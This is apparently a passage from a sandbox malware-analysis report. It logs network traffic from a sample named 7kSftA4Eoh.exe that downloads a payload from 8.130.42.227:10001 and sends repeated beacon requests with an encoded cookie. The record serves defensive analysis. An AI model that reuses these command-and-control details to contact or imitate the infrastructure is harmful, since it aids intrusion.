                                                                Oct 1, 2024 09:20:47.748182058 CEST10001499298.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:47.748256922 CEST4992910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:47.748441935 CEST4992910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:47.753249884 CEST10001499298.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:48.724741936 CEST10001499298.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:48.724790096 CEST10001499298.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:48.726980925 CEST4992910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:48.726982117 CEST4992910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:48.731848955 CEST10001499298.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:48.838957071 CEST4993010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:48.843815088 CEST10001499308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:48.843894005 CEST4993010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:48.844101906 CEST4993010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:48.848805904 CEST10001499308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:49.782494068 CEST10001499308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:49.782510042 CEST10001499308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:49.782566071 CEST4993010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:49.782712936 CEST4993010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:49.787436008 CEST10001499308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:49.900711060 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:49.905781984 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:49.908862114 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:49.908862114 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:49.913795948 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:50.868977070 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:50.869026899 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:50.870996952 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:50.871037960 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:50.977874041 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:50.978387117 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.287494898 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.898752928 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.975265026 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.992496014 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:51.992517948 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:51.992526054 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:51.992532969 CEST10001499318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:51.992541075 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:51.992662907 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.992664099 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.992662907 CEST4993110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.992800951 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.992800951 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:51.997648001 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:52.939094067 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:52.939150095 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:52.939166069 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:52.939208984 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:52.939413071 CEST4993210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:52.944113970 CEST10001499328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:53.055826902 CEST4993310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:53.060834885 CEST10001499338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:53.060906887 CEST4993310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:53.061053991 CEST4993310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:53.065798998 CEST10001499338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:54.009251118 CEST10001499338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:54.009269953 CEST10001499338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:54.010942936 CEST4993310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:54.010942936 CEST4993310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:54.017225027 CEST10001499338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:54.119138002 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:54.123985052 CEST10001499348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:54.127598047 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:54.127598047 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:54.132437944 CEST10001499348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:55.078138113 CEST10001499348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:55.078196049 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.078206062 CEST10001499348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:55.078249931 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.078380108 CEST4993410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.083523989 CEST10001499348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:55.196722031 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.333872080 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:55.333950043 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.334223032 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:55.338924885 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.315500021 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.315516949 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.315525055 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.320815086 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.353562117 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.502731085 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.529200077 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.529278994 CEST10001499358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.529290915 CEST10001499368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:56.529372931 CEST4993510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.529375076 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.536772013 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:56.541579008 CEST10001499368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.479665995 CEST10001499368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.479718924 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.479739904 CEST10001499368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.479779005 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.479902983 CEST4993610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.484652042 CEST10001499368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.587357044 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.592228889 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:57.592293024 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.592443943 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:57.597209930 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539206982 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539222956 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.539468050 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.539468050 CEST4993710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.544347048 CEST10001499378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.652718067 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.657535076 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:58.660924911 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.660924911 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:58.665770054 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608714104 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608764887 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.608844042 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.610126019 CEST4993810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.614833117 CEST10001499388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.728813887 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.733604908 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:59.733663082 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.733863115 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:59.739005089 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694813013 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694859982 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.694909096 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.694951057 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.695050001 CEST4993910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.699815989 CEST10001499398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.805023909 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.809825897 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:00.809911966 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.812725067 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:00.817611933 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773719072 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773785114 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:01.773866892 CEST10001499408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:21:01.773905993 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:02.040728092 CEST4994010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:21:02.046310902 CEST10001499408.130.42.227192.168.2.4

                                                                HTTP Request Dependency Graph

                                                                • 8.130.42.227:10001

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.4497308.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:16:57.838449955 CEST187OUTGET /2yMe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:16:58.781096935 CEST119INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:16:58 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 277063


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.4497318.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:16:59.805041075 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:00.947107077 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.4497328.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:01.261580944 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:02.228874922 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.4497338.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:02.339623928 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:03.309341908 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:03 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.4497348.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:03.417782068 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:04.365963936 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.4497358.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:04.561846972 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:05.519514084 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.4497368.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:05.636363983 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:06.606287003 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.4497378.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:06.714562893 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:07.666435957 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:07 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.4497388.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:07.777250051 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:08.719686985 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.4497398.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:08.840127945 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:09.789865971 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.4497408.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:09.902760983 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:13.878774881 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:13 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.4497428.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:13.995946884 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:14.961479902 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:14 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.4497448.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:15.074542046 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:16.042283058 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:15 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.4497478.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:16.159049988 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:17.115231991 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:16 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.4497498.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:17.230444908 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:18.198241949 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:18 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.4497518.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:17:18.323998928 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:19.277784109 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:19 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
